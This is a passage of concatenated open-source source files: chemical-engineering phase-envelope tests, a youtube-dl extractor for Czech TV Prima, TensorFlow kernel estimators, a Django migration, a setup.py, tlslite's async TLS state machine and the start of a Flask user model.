    of `(P_points2, Ts_known2)`, and `Ts_bubble_expect` is identical to
    `Ts_dew_expect`; the bubble envelope is never actually checked.  Fixing
    it requires regenerated expected data, so it is only flagged here.
    """
    IDs = ['nitrogen', 'carbon dioxide', 'H2S', 'methane', 'ethane', 'propane', 'isobutane', 'butane', 'isopentane', 'pentane', 'Hexane', 'Heptane', 'Octane', 'Nonane', 'Decane', 'Undecane', 'Dodecane', 'Tridecane', 'Tetradecane', 'Pentadecane', 'Hexadecane', 'Heptadecane', 'Octadecane', 'Nonadecane', 'Eicosane', 'Heneicosane', 'Docosane', 'Tricosane', 'Tetracosane', 'Pentacosane', 'Hexacosane', 'Heptacosane', 'Octacosane', 'Nonacosane', 'Triacontane', 'Benzene', 'Toluene', 'Ethylbenzene', 'Xylene', '1,2,4-Trimethylbenzene', 'Cyclopentane', 'Methylcyclopentane', 'Cyclohexane', 'Methylcyclohexane']
    zs = [9.11975115499676e-05, 9.986813065240533e-05, 0.0010137795304828892, 0.019875879000370657, 0.013528874875432457, 0.021392773691700402, 0.00845450438914824, 0.02500218071904368, 0.016114189201071587, 0.027825798446635016, 0.05583179467176313, 0.0703116540769539, 0.07830577180555454, 0.07236459223729574, 0.0774523322851419, 0.057755091407705975, 0.04030134965162674, 0.03967043780553758, 0.03514481759005302, 0.03175471055284055, 0.025411123554079325, 0.029291866298718154, 0.012084986551713202, 0.01641114551124426, 0.01572454598093482, 0.012145363820829673, 0.01103585282423499, 0.010654818322680342, 0.008777712911254239, 0.008732073853067238, 0.007445155260036595, 0.006402875549212365, 0.0052908087849774296, 0.0048199150683177075, 0.015943943854195963, 0.004452253754752775, 0.01711981267072777, 0.0024032720444511282, 0.032178399403544646, 0.0018219517069058137, 0.003403378548794345, 0.01127516775495176, 0.015133143423489698, 0.029483213283483682]
    pkg = PropertyPackageConstants(IDs, PR_PKG)
    # Envelope-tracing controls.
    max_step_damping = 50
    P_low = 1e4
    factor = 1.2
    min_step_termination = 1000
    min_factor_termination = 1.0002
    pkg.pkg.FLASH_VF_TOL = 1e-8
    P_high = 2e8
    spec_points = linspace(1e5, 4e6, 40)
    P_points, Ts_known, xs_known = pkg.pkg.dew_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
                                                      factor=factor, min_step_termination=min_step_termination,
                                                      min_factor_termination=min_factor_termination,
                                                      max_step_damping=max_step_damping,
                                                      spec_points=spec_points
                                                      )
    P_points2, Ts_known2, ys_known = pkg.pkg.bubble_T_envelope(zs, P_low=P_low, P_high=P_high, xtol=1E-10,
                                                      factor=factor, min_step_termination=min_step_termination,
                                                      max_step_damping=max_step_damping,
                                                      min_factor_termination=min_factor_termination,
                                                      spec_points=spec_points
                                                      )
    # Keep only the points that fell exactly on the spec_points grid.
    Ps_dew_check = []
    Ts_dew_check = []
    Ts_dew_expect = [585.1745093521665, 609.5133715138915, 624.6944734390993, 635.7991119723131, 644.5334850169733, 651.6941060581852, 657.7213913216676, 662.8858558611348, 667.3660286752593, 671.2860034847065, 674.7354375617153, 677.7810270676093, 680.4734809440047, 682.8519536806468, 684.9469622199979, 686.7823540873131, 688.3766543470003, 689.7439863506575, 690.8946833742955, 691.8356590318011, 692.5705695910872, 693.0997717010517, 693.4200465117376, 693.5240144469666, 693.399082494406, 693.0255964253895, 692.3734715991103, 691.3954910689196, 690.0119359589117, 688.0668235519908, 685.1543692400655, 679.0864243340858]
    for P_dew, T_dew in zip(P_points, Ts_known):
        if abs(P_dew % 1e5) < 1e-5:
            Ps_dew_check.append(P_dew)
            Ts_dew_check.append(T_dew)
    Ps_bubble_check = []
    Ts_bubble_check = []
    Ts_bubble_expect = [585.1745093521665, 609.5133715138915, 624.6944734390993, 635.7991119723131, 644.5334850169733, 651.6941060581852, 657.7213913216676, 662.8858558611348, 667.3660286752593, 671.2860034847065, 674.7354375617153, 677.7810270676093, 680.4734809440047, 682.8519536806468, 684.9469622199979, 686.7823540873131, 688.3766543470003, 689.7439863506575, 690.8946833742955, 691.8356590318011, 692.5705695910872, 693.0997717010517, 693.4200465117376, 693.5240144469666, 693.399082494406, 693.0255964253895, 692.3734715991103, 691.3954910689196, 690.0119359589117, 688.0668235519908, 685.1543692400655, 679.0864243340858]
    # NOTE(review): should almost certainly be zip(P_points2, Ts_known2).
    for P_bubble, T_bubble in zip(P_points, Ts_known):
        if abs(P_bubble % 1e5) < 1e-5:
            Ps_bubble_check.append(P_bubble)
            Ts_bubble_check.append(T_bubble)
    # The traced envelopes terminate before the last eight spec pressures.
    assert_allclose(Ps_bubble_check, spec_points[:-8])
    assert_allclose(Ps_dew_check, spec_points[:-8])
    assert_allclose(Ts_dew_check, Ts_dew_expect, rtol=1e-5)
    assert_allclose(Ts_bubble_check, Ts_bubble_expect, rtol=1e-5)
@pytest.mark.deprecated
def test_TPD_bubble_dew():
    """The tangent plane distance must vanish at bubble and dew points.

    At a bubble point (VF=0) the liquid composition is the tested phase
    against the incipient vapor; at a dew point (VF=1) the roles reverse.
    Four flashes are checked: bubble at fixed P and fixed T, then dew at
    fixed P and fixed T.
    """
    kij = 7.609447e-003
    constants = PropertyPackageConstants(
        ['ethane', 'n-pentane'], PR_PKG, kijs=[[0, kij], [kij, 0]])
    eos_pkg = constants.pkg
    feed = [0.7058334393128614, 0.2941665606871387]  # 50/50 mass basis

    def tpd_after_flash(**flash_spec):
        # Flash at the requested specification, refresh both phases'
        # fugacity coefficients, then evaluate the tangent plane distance.
        eos_pkg.flash(zs=feed, **flash_spec)
        eos_pkg.eos_l.fugacities()
        eos_pkg.eos_g.fugacities()
        if flash_spec.get('VF') == 0:
            # Bubble point: liquid tested against the incipient gas phase.
            return TPD(eos_pkg.eos_g.T, eos_pkg.eos_l.zs, eos_pkg.eos_l.lnphis_l,
                       eos_pkg.eos_g.zs, eos_pkg.eos_g.lnphis_g)
        # Dew point: gas tested against the incipient liquid phase.
        return TPD(eos_pkg.eos_g.T, eos_pkg.eos_g.zs, eos_pkg.eos_g.lnphis_g,
                   eos_pkg.eos_l.zs, eos_pkg.eos_l.lnphis_l)

    assert_allclose(tpd_after_flash(P=1e6, VF=0), 0, atol=1e-6)
    assert_allclose(tpd_after_flash(T=200, VF=0), 0, atol=1e-6)
    assert_allclose(tpd_after_flash(P=1e6, VF=1), 0, atol=1e-6)
    assert_allclose(tpd_after_flash(T=300, VF=1), 0, atol=1e-6)
@pytest.mark.deprecated
def test_stab_comb_products_need_both_roots():
    """Flash a combustion-product mixture (N2/CO2/O2/H2O) at a temperature
    where both EOS roots must be considered for stability; the converged
    state should be a single gas phase.
    """
    comb_IDs = ['N2', 'CO2', 'O2', 'H2O']
    comb_zs = [0.5939849621247668,
               0.112781954982051,
               0.0676691730155464,
               0.2255639098776358]
    # N2-CO2, N2-O2 and CO2-H2O binary interaction parameters; others zero.
    kijs = [[0.0, -0.0122, -0.0159, 0.0], [-0.0122, 0.0, 0.0, 0.0952], [-0.0159, 0.0, 0.0, 0.0], [0.0, 0.0952, 0.0, 0.0]]
    # Fix: the original built a kij-less package first and immediately
    # rebound pkg2, discarding it; construct the package once with its kijs.
    pkg2 = PropertyPackageConstants(comb_IDs, PR_PKG, kijs=kijs)
    pkg2.pkg.flash_caloric(P=1e5, T=794.5305048838037, zs=comb_zs)
    assert 'g' == pkg2.pkg.phase
Dineshs91/youtube-dl | refs/heads/master | youtube_dl/extractor/iprima.py | 96 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
from random import random
from math import floor
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
ExtractorError,
remove_end,
)
class IPrimaIE(InfoExtractor):
    """Extractor for videos hosted on play.iprima.cz (Czech TV Prima).

    Streams are served over RTMP; the stream base URL is scraped from the
    site's embedded Livebox player script.
    """
    _VALID_URL = r'https?://play\.iprima\.cz/(?:[^/]+/)*(?P<id>[^?#]+)'

    _TESTS = [{
        'url': 'http://play.iprima.cz/particka/particka-92',
        'info_dict': {
            'id': '39152',
            'ext': 'flv',
            'title': 'Partička (92)',
            'description': 'md5:74e9617e51bca67c3ecfb2c6f9766f45',
            'thumbnail': 'http://play.iprima.cz/sites/default/files/image_crops/image_620x349/3/491483_particka-92_image_620x349.jpg',
        },
        'params': {
            'skip_download': True,  # requires rtmpdump
        },
    }, {
        'url': 'http://play.iprima.cz/particka/tchibo-particka-jarni-moda',
        'info_dict': {
            'id': '9718337',
            'ext': 'flv',
            'title': 'Tchibo Partička - Jarní móda',
            'thumbnail': 're:^http:.*\.jpg$',
        },
        'params': {
            'skip_download': True,  # requires rtmpdump
        },
    }, {
        'url': 'http://play.iprima.cz/zpravy-ftv-prima-2752015',
        'only_matching': True,
    }]

    def _real_extract(self, url):
        """Scrape the video page and Livebox player to build RTMP formats."""
        mobj = re.match(self._VALID_URL, url)
        video_id = mobj.group('id')

        webpage = self._download_webpage(url, video_id)

        # Czech: "You do not have permission to access this page."
        if re.search(r'Nemáte oprávnění přistupovat na tuto stránku\.\s*</div>', webpage):
            raise ExtractorError(
                '%s said: You do not have permission to access this page' % self.IE_NAME, expected=True)

        # Player script URL carries a random cache-busting token pair.
        player_url = (
            'http://embed.livebox.cz/iprimaplay/player-embed-v2.js?__tok%s__=%s' %
            (floor(random() * 1073741824), floor(random() * 1073741824))
        )

        # The player endpoint validates the Referer header.
        req = compat_urllib_request.Request(player_url)
        req.add_header('Referer', url)
        playerpage = self._download_webpage(req, video_id)

        # Second match ([1]) holds the RTMP stream pieces (server,
        # '?auth=' separator, auth token); joining them yields the base URL.
        base_url = ''.join(re.findall(r"embed\['stream'\] = '(.+?)'.+'(\?auth=)'.+'(.+?)';", playerpage)[1])

        # Geo-restricted zones use a suffixed token name in the stream URL.
        zoneGEO = self._html_search_regex(r'"zoneGEO":(.+?),', webpage, 'zoneGEO')
        if zoneGEO != '0':
            base_url = base_url.replace('token', 'token_' + zoneGEO)

        formats = []
        for format_id in ['lq', 'hq', 'hd']:
            filename = self._html_search_regex(
                r'"%s_id":(.+?),' % format_id, webpage, 'filename')
            # 'null' means this quality is not available for the video.
            if filename == 'null':
                continue
            real_id = self._search_regex(
                r'Prima-(?:[0-9]{10}|WEB)-([0-9]+)[-_]',
                filename, 'real video id')
            if format_id == 'lq':
                quality = 0
            elif format_id == 'hq':
                quality = 1
            elif format_id == 'hd':
                quality = 2
                # HD files live under the 'hq/' path prefix on the server.
                filename = 'hq/' + filename
            formats.append({
                'format_id': format_id,
                'url': base_url,
                'quality': quality,
                # Strip quotes and the 4-char extension for the RTMP play path.
                'play_path': 'mp4:' + filename.replace('"', '')[:-4],
                'rtmp_live': True,
                'ext': 'flv',
            })
        self._sort_formats(formats)

        # NOTE(review): `real_id` is only bound inside the loop above; if
        # every quality is 'null' this would raise NameError -- presumably
        # _sort_formats errors out first on an empty list, but confirm.
        return {
            'id': real_id,
            'title': remove_end(self._og_search_title(webpage), ' | Prima PLAY'),
            'thumbnail': self._og_search_thumbnail(webpage),
            'formats': formats,
            'description': self._search_regex(
                r'<p[^>]+itemprop="description"[^>]*>([^<]+)',
                webpage, 'description', default=None),
        }
|
jpopelka/docker-py | refs/heads/master | docker/ssladapter/__init__.py | 87 | from .ssladapter import SSLAdapter # flake8: noqa
|
chemelnucfin/tensorflow | refs/heads/master | tensorflow/contrib/kernel_methods/python/kernel_estimators.py | 5 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimators that combine explicit kernel mappings with linear models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from tensorflow.contrib import layers
from tensorflow.contrib.kernel_methods.python.mappers import dense_kernel_mapper as dkm
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import head as head_lib
from tensorflow.contrib.learn.python.learn.estimators import linear
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import tf_logging as logging
# Keys used to look up configuration in the `params` dict that is passed to
# the kernel estimator's model_fn.
_FEATURE_COLUMNS = "feature_columns"
_KERNEL_MAPPERS = "kernel_mappers"
_OPTIMIZER = "optimizer"
def _check_valid_kernel_mappers(kernel_mappers):
"""Checks that the input kernel_mappers are valid."""
if kernel_mappers is None:
return True
for kernel_mappers_list in six.itervalues(kernel_mappers):
for kernel_mapper in kernel_mappers_list:
if not isinstance(kernel_mapper, dkm.DenseKernelMapper):
return False
return True
def _check_valid_head(head):
"""Returns true if the provided head is supported."""
if head is None:
return False
# pylint: disable=protected-access
return isinstance(head, head_lib._BinaryLogisticHead) or isinstance(
head, head_lib._MultiClassHead)
# pylint: enable=protected-access
def _update_features_and_columns(features, feature_columns,
                                 kernel_mappers_dict):
  """Updates features and feature_columns based on provided kernel mappers.

  For each real-valued column with kernel mappers, a new "<name>_MAPPED"
  column is added whose feature tensor is the concatenation of all mapper
  outputs for that column. Currently supports the update of
  `RealValuedColumn`s only.

  Args:
    features: Initial features dict. The key is a `string` (feature column name)
      and the value is a tensor.
    feature_columns: Initial iterable containing all the feature columns to be
      consumed (possibly after being updated) by the model. All items should be
      instances of classes derived from `FeatureColumn`.
    kernel_mappers_dict: A dict from feature column (type: _FeatureColumn) to
      objects inheriting from KernelMapper class.

  Returns:
    updated features and feature_columns based on provided kernel_mappers_dict.
    The inputs are not mutated: copies are returned, with the original
    (unmapped) features/columns kept alongside the mapped ones.
  """
  if kernel_mappers_dict is None:
    return features, feature_columns

  # First construct new columns and features affected by kernel_mappers_dict.
  mapped_features = {}
  mapped_columns = set()
  for feature_column in kernel_mappers_dict:
    column_name = feature_column.name
    # Currently only mappings over RealValuedColumns are supported.
    if not isinstance(feature_column, layers.feature_column._RealValuedColumn):  # pylint: disable=protected-access
      logging.warning(
          "Updates are currently supported on RealValuedColumns only. Metadata "
          "for FeatureColumn {} will not be updated.".format(column_name))
      continue
    mapped_column_name = column_name + "_MAPPED"
    # Construct new feature columns based on provided kernel_mappers.
    column_kernel_mappers = kernel_mappers_dict[feature_column]
    # The mapped column's dimension is the sum of all mapper output dims,
    # matching the concatenation performed below.
    new_dim = sum(mapper.output_dim for mapper in column_kernel_mappers)
    mapped_columns.add(
        layers.feature_column.real_valued_column(mapped_column_name, new_dim))

    # Get mapped features by concatenating mapped tensors (one mapped tensor
    # per kernel mappers from the list of kernel mappers corresponding to each
    # feature column).
    output_tensors = []
    for kernel_mapper in column_kernel_mappers:
      output_tensors.append(kernel_mapper.map(features[column_name]))
    # Concatenate the per-mapper outputs along axis 1 (the feature axis).
    tensor = array_ops.concat(output_tensors, 1)
    mapped_features[mapped_column_name] = tensor

  # Finally update features dict and feature_columns.
  features = features.copy()
  features.update(mapped_features)
  feature_columns = set(feature_columns)
  feature_columns.update(mapped_columns)

  return features, feature_columns
def _kernel_model_fn(features, labels, mode, params, config=None):
  """model_fn for the Estimator using kernel methods.

  Applies the kernel mappings in `params` to the input features and then
  delegates to the (linear) model_fn over the mapped features/columns.

  Args:
    features: `Tensor` or dict of `Tensor` (depends on data passed to `fit`).
    labels: `Tensor` of shape [batch_size, 1] or [batch_size] labels of
      dtype `int32` or `int64` in the range `[0, n_classes)`.
    mode: Defines whether this is training, evaluation or prediction. See
      `ModeKeys`.
    params: A dict of hyperparameters. Expected keys: a `Head` instance under
      "head", the feature columns, an optional optimizer, and the kernel
      mappers dict.
    config: `RunConfig` object to configure the runtime settings.

  Returns:
    A `ModelFnOps` instance.

  Raises:
    ValueError: If mode is not any of the `ModeKeys`.
  """
  mapped_features, mapped_columns = _update_features_and_columns(
      features, params[_FEATURE_COLUMNS], params[_KERNEL_MAPPERS])
  # NOTE(review): params is mutated in place so the linear model_fn sees the
  # post-mapping columns; this mirrors the original behavior.
  params[_FEATURE_COLUMNS] = mapped_columns
  return linear._linear_model_fn(  # pylint: disable=protected-access
      mapped_features, labels, mode, params, config)
class _KernelEstimator(estimator.Estimator):
  """Generic kernel-based linear estimator."""

  def __init__(self,
               feature_columns=None,
               model_dir=None,
               weight_column_name=None,
               head=None,
               optimizer=None,
               kernel_mappers=None,
               config=None):
    """Constructs a `_KernelEstimator` object.

    At least one of `feature_columns` and `kernel_mappers` must be provided,
    `kernel_mappers` must pass validation, and `head` must be of a supported
    type; otherwise a `ValueError` is raised.
    """
    if not (feature_columns or kernel_mappers):
      raise ValueError(
          "You should set at least one of feature_columns, kernel_mappers.")
    if not _check_valid_kernel_mappers(kernel_mappers):
      raise ValueError("Invalid kernel mappers.")
    if not _check_valid_head(head):
      raise ValueError(
          "head type: {} is not supported. Supported head types: "
          "_BinaryLogisticHead, _MultiClassHead.".format(type(head)))
    estimator_params = {
        "head": head,
        _FEATURE_COLUMNS: feature_columns or [],
        _OPTIMIZER: optimizer,
        _KERNEL_MAPPERS: kernel_mappers,
    }
    super(_KernelEstimator, self).__init__(
        model_fn=_kernel_model_fn,
        model_dir=model_dir,
        config=config,
        params=estimator_params)
class KernelLinearClassifier(_KernelEstimator):
  """Linear classifier using kernel methods as feature preprocessing.

  Trains a linear model after (optionally) mapping the input features into a
  new space via explicit kernel mappings. Thanks to the mappings, a linear
  classifier trained in the mapped (output) space can capture
  non-linearities present in the input space.

  Feature columns may therefore be supplied in two places:
  * as elements of `feature_columns` in the constructor, and/or
  * as keys of the `kernel_mappers` dict.
  A column appearing only in `feature_columns` is used unmapped; a column
  appearing as a `kernel_mappers` key has its mappers applied; a column may
  appear in both places. Currently kernel_mappers are supported for
  _RealValuedColumns only.

  Example usage:
  ```
  real_column_a = real_valued_column(name='real_column_a',...)
  sparse_column_b = sparse_column_with_hash_bucket(...)
  kernel_mappers = {real_column_a : [RandomFourierFeatureMapper(...)]}
  optimizer = ...

  # real_column_a is used both unmapped and mapped; sparse_column_b is
  # unaffected by kernel mappers.
  kernel_classifier = KernelLinearClassifier(
      feature_columns=[real_column_a, sparse_column_b],
      model_dir=...,
      optimizer=optimizer,
      kernel_mappers=kernel_mappers)

  # real_column_a is used in mapped form only.
  kernel_classifier = KernelLinearClassifier(
      feature_columns=[sparse_column_b],
      model_dir=...,
      optimizer=optimizer,
      kernel_mappers=kernel_mappers)

  kernel_classifier.fit(input_fn=train_input_fn)
  kernel_classifier.evaluate(input_fn=eval_input_fn)
  kernel_classifier.predict(...)
  ```

  Input of `fit` and `evaluate` should have the following features,
  otherwise there will be a `KeyError`:

  * if `weight_column_name` is not `None`, a feature with
    `key=weight_column_name` whose value is a `Tensor`.
  * for each `column` in `feature_columns`:
    - if `column` is a `SparseColumn`, a feature with `key=column.name`
      whose `value` is a `SparseTensor`.
    - if `column` is a `WeightedSparseColumn`, two features: the first with
      `key` the id column name, the second with `key` the weight column
      name. Both features' `value` must be a `SparseTensor`.
    - if `column` is a `RealValuedColumn`, a feature with `key=column.name`
      whose `value` is a `Tensor`.
  """

  def __init__(self,
               feature_columns=None,
               model_dir=None,
               n_classes=2,
               weight_column_name=None,
               optimizer=None,
               kernel_mappers=None,
               config=None):
    """Construct a `KernelLinearClassifier` estimator object.

    Args:
      feature_columns: An iterable containing all the feature columns used
        by the model. All items should be instances of classes derived from
        `FeatureColumn`.
      model_dir: Directory to save model parameters, graph etc. Can also be
        used to load checkpoints and continue training a saved model.
      n_classes: number of label classes (default: binary classification).
        Class labels are integer indices in [0, n_classes); convert
        arbitrary label values to indices first.
      weight_column_name: A string naming the feature column holding
        per-example weights (used to down-weight or boost examples; it is
        multiplied by the example's loss).
      optimizer: The optimizer used to train the model. If specified, it
        should be a `tf.Optimizer` instance. If `None`, the Ftrl optimizer
        is used by default.
      kernel_mappers: Dict from feature columns to lists of kernel mappers
        applied to the corresponding column before training. Only
        _RealValuedColumns are supported, so all mappers should conform to
        the `DenseKernelMapper` interface
        (see ./mappers/dense_kernel_mapper.py).
      config: `RunConfig` object to configure the runtime settings.

    Returns:
      A `KernelLinearClassifier` estimator.

    Raises:
      ValueError: if n_classes < 2.
      ValueError: if neither feature_columns nor kernel_mappers are provided.
      ValueError: if mappers provided as kernel_mappers values are invalid.
    """
    classification_head = head_lib.multi_class_head(
        n_classes=n_classes, weight_column_name=weight_column_name)
    super(KernelLinearClassifier, self).__init__(
        feature_columns=feature_columns,
        model_dir=model_dir,
        weight_column_name=weight_column_name,
        head=classification_head,
        optimizer=optimizer,
        kernel_mappers=kernel_mappers,
        config=config)

  def predict_classes(self, input_fn=None):
    """Runs inference to determine the predicted class per instance.

    Args:
      input_fn: The input function providing features.

    Returns:
      A generator of predicted classes for the features provided by
      input_fn. Each predicted class is represented by its class index
      (i.e. integer from 0 to n_classes-1).
    """
    class_key = prediction_key.PredictionKey.CLASSES
    raw_predictions = super(KernelLinearClassifier, self).predict(
        input_fn=input_fn, outputs=[class_key])
    return (prediction[class_key] for prediction in raw_predictions)

  def predict_proba(self, input_fn=None):
    """Runs inference to determine the class probability predictions.

    Args:
      input_fn: The input function providing features.

    Returns:
      A generator of predicted class probabilities for the features
      provided by input_fn.
    """
    proba_key = prediction_key.PredictionKey.PROBABILITIES
    raw_predictions = super(KernelLinearClassifier, self).predict(
        input_fn=input_fn, outputs=[proba_key])
    return (prediction[proba_key] for prediction in raw_predictions)
|
naresh21/synergetics-edx-platform | refs/heads/oxa/master.fic | openedx/core/djangoapps/micro_masters/migrations/0006_auto_20170712_1019.py | 2 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Removes the ProgramCertificateHtmlViewConfiguration model entirely.

    dependencies = [
        ('micro_masters', '0005_programcertificatehtmlviewconfiguration_programcertificatesignatories_programgeneratedcertificate'),
    ]
    operations = [
        # Drop the foreign key to the user model first so the table can be
        # deleted without dangling references.
        migrations.RemoveField(
            model_name='programcertificatehtmlviewconfiguration',
            name='changed_by',
        ),
        migrations.DeleteModel(
            name='ProgramCertificateHtmlViewConfiguration',
        ),
    ]
|
wheelcms/wheelcms_categories | refs/heads/master | setup.py | 1 | from setuptools import setup, find_packages
import os
# Package version, also used below in the setup() metadata.
version = '0.9'

# Packaging metadata for the wheelcms_categories distribution.
setup(name='wheelcms_categories',
      version=version,
      description="WheelCMS category implementation",
      # Reuse the README as the PyPI long description.
      long_description=open("README.txt").read(),
      classifiers=[
        "Programming Language :: Python",
        ],
      keywords='',
      author='Ivo van der Wijk',
      author_email='wheelcms@in.m3r.nl',
      url='http://github.com/wheelcms/wheelcms_categories',
      license='BSD',
      packages=find_packages(exclude=['ez_setup']),
      namespace_packages=[],
      include_package_data=True,
      zip_safe=False,
      install_requires=[
          'setuptools',
          # NOTE(review): pytest as an install (not test) requirement looks
          # unintentional — confirm before removing.
          'pytest',
      ],
      entry_points={
      },
      )
|
Crystalnix/house-of-life-chromium | refs/heads/master | third_party/tlslite/tlslite/integration/AsyncStateMachine.py | 121 | """
A state machine for using TLS Lite with asynchronous I/O.
"""
class AsyncStateMachine:
    """
    This is an abstract class that's used to integrate TLS Lite with
    asyncore and Twisted.

    This class signals wantsReadEvent() and wantsWriteEvent().  When
    the underlying socket has become readable or writeable, the event
    should be passed to this class by calling inReadEvent() or
    inWriteEvent().  This class will then try to read or write through
    the socket, and will update its state appropriately.

    This class will forward higher-level events to its subclass.  For
    example, when a complete TLS record has been received,
    outReadEvent() will be called with the decrypted data.
    """

    def __init__(self):
        self._clear()

    def _clear(self):
        #These store the various asynchronous operations (i.e.
        #generators).  Only one of them, at most, is ever active at a
        #time.
        self.handshaker = None
        self.closer = None
        self.reader = None
        self.writer = None

        #This stores the result from the last call to the
        #currently active operation.  If 0 it indicates that the
        #operation wants to read, if 1 it indicates that the
        #operation wants to write.  If None, there is no active
        #operation.
        self.result = None

    def _checkAssert(self, maxActive=1):
        #Sanity check: at most `maxActive` operations are active, and
        #self.result is consistent with whether anything is in flight.
        activeOps = sum(1 for op in (self.handshaker, self.closer,
                                     self.reader, self.writer) if op)

        if self.result is None:
            #No pending socket wish -> no operation may be active.
            if activeOps != 0:
                raise AssertionError()
        elif self.result in (0, 1):
            #An operation is waiting on the socket -> exactly one active.
            if activeOps != 1:
                raise AssertionError()
        else:
            #self.result must always be None, 0, or 1.
            raise AssertionError()
        if activeOps > maxActive:
            raise AssertionError()

    def wantsReadEvent(self):
        """If the state machine wants to read.

        If an operation is active, this returns whether or not the
        operation wants to read from the socket.  If an operation is
        not active, this returns None.

        @rtype: bool or None
        @return: If the state machine wants to read.
        """
        if self.result is not None:
            return self.result == 0
        return None

    def wantsWriteEvent(self):
        """If the state machine wants to write.

        If an operation is active, this returns whether or not the
        operation wants to write to the socket.  If an operation is
        not active, this returns None.

        @rtype: bool or None
        @return: If the state machine wants to write.
        """
        if self.result is not None:
            return self.result == 1
        return None

    def outConnectEvent(self):
        """Called when a handshake operation completes.

        May be overridden in subclass.
        """
        pass

    def outCloseEvent(self):
        """Called when a close operation completes.

        May be overridden in subclass.
        """
        pass

    def outReadEvent(self, readBuffer):
        """Called when a read operation completes.

        May be overridden in subclass."""
        pass

    def outWriteEvent(self):
        """Called when a write operation completes.

        May be overridden in subclass."""
        pass

    def inReadEvent(self):
        """Tell the state machine it can read from the socket."""
        try:
            self._checkAssert()
            if self.handshaker:
                self._doHandshakeOp()
            elif self.closer:
                self._doCloseOp()
            elif self.reader:
                self._doReadOp()
            elif self.writer:
                self._doWriteOp()
            else:
                #Nothing in progress: start reading the next TLS record.
                self.reader = self.tlsConnection.readAsync(16384)
                self._doReadOp()
        except:
            #Deliberately bare: on *any* error, drop all state before
            #re-raising so the machine isn't left half-active.
            self._clear()
            raise

    def inWriteEvent(self):
        """Tell the state machine it can write to the socket."""
        try:
            self._checkAssert()
            if self.handshaker:
                self._doHandshakeOp()
            elif self.closer:
                self._doCloseOp()
            elif self.reader:
                self._doReadOp()
            elif self.writer:
                self._doWriteOp()
            else:
                self.outWriteEvent()
        except:
            #Deliberately bare: clear state on any error, then re-raise.
            self._clear()
            raise

    def _doHandshakeOp(self):
        try:
            #next() (builtin, 2.6+) instead of the Py2-only .next() method.
            self.result = next(self.handshaker)
        except StopIteration:
            self.handshaker = None
            self.result = None
            self.outConnectEvent()

    def _doCloseOp(self):
        try:
            self.result = next(self.closer)
        except StopIteration:
            self.closer = None
            self.result = None
            self.outCloseEvent()

    def _doReadOp(self):
        self.result = next(self.reader)
        if self.result not in (0, 1):
            #Any value other than 0/1 is the decrypted data itself.
            readBuffer = self.result
            self.reader = None
            self.result = None
            self.outReadEvent(readBuffer)

    def _doWriteOp(self):
        try:
            self.result = next(self.writer)
        except StopIteration:
            self.writer = None
            self.result = None

    def setHandshakeOp(self, handshaker):
        """Start a handshake operation.

        @type handshaker: generator
        @param handshaker: A generator created by using one of the
        asynchronous handshake functions (i.e. handshakeServerAsync, or
        handshakeClientxxx(..., async=True).
        """
        try:
            self._checkAssert(0)
            self.handshaker = handshaker
            self._doHandshakeOp()
        except:
            self._clear()
            raise

    def setServerHandshakeOp(self, **args):
        """Start a handshake operation.

        The arguments passed to this function will be forwarded to
        L{tlslite.TLSConnection.TLSConnection.handshakeServerAsync}.
        """
        handshaker = self.tlsConnection.handshakeServerAsync(**args)
        self.setHandshakeOp(handshaker)

    def setCloseOp(self):
        """Start a close operation.
        """
        try:
            self._checkAssert(0)
            self.closer = self.tlsConnection.closeAsync()
            self._doCloseOp()
        except:
            self._clear()
            raise

    def setWriteOp(self, writeBuffer):
        """Start a write operation.

        @type writeBuffer: str
        @param writeBuffer: The string to transmit.
        """
        try:
            self._checkAssert(0)
            self.writer = self.tlsConnection.writeAsync(writeBuffer)
            self._doWriteOp()
        except:
            self._clear()
            raise
|
jparker/therminator_server | refs/heads/master | therminator/models.py | 1 | from . import app, db, bcrypt
from flask_login import UserMixin
from functools import wraps
from sqlalchemy.orm import validates
import sqlalchemy.dialects.postgresql as psql
def validates_presence(f):
    """Decorator for SQLAlchemy validators that rejects ``None`` values.

    Raises a ``ValueError`` naming the attribute when the incoming value is
    ``None``; otherwise delegates to the wrapped validator unchanged.
    """
    @wraps(f)
    def wrapper(self, key, value):
        if value is None:
            raise ValueError("{} can't be blank".format(key))
        return f(self, key, value)
    return wrapper
class User(db.Model, UserMixin):
    """An account that can log in and owns zero or more homes."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    name = db.Column(db.String(255), nullable=False)
    email = db.Column(db.String(255), nullable=False, unique=True)
    # Stores the bcrypt hash, never the plaintext (see validates_password).
    password = db.Column(db.String(255), nullable=False)
    # Random 64-hex-char token generated by Postgres (pgcrypto) on insert.
    api_key = db.Column(
        db.String(255),
        nullable=False,
        server_default=db.func.encode(db.func.gen_random_bytes(32), 'hex'),
        unique=True
    )
    homes = db.relationship(
        'Home',
        backref='user',
        lazy='dynamic',
        order_by='Home.name'
    )
    def __init__(self, name, email, password):
        # `password` is plaintext here; the 'password' validator below
        # hashes it before it is stored.
        self.name = name
        self.email = email
        self.password = password
    def __repr__(self):
        return '<User id={} email={}>'.format(self.id, self.email)
    def is_correct_password(self, plaintext):
        # Constant-time comparison of `plaintext` against the stored hash.
        return bcrypt.check_password_hash(self.password, plaintext)
    @validates('password')
    def validates_password(self, key, value):
        # Replace any assigned plaintext with its bcrypt hash.
        return bcrypt.generate_password_hash(
            value,
            app.config['BCRYPT_LOG_ROUNDS'],
        ).decode()
class Home(db.Model):
    """A physical location owned by a user; groups sensors."""
    __tablename__ = 'homes'
    __table_args__ = (
        # A user may not have two homes with the same name.
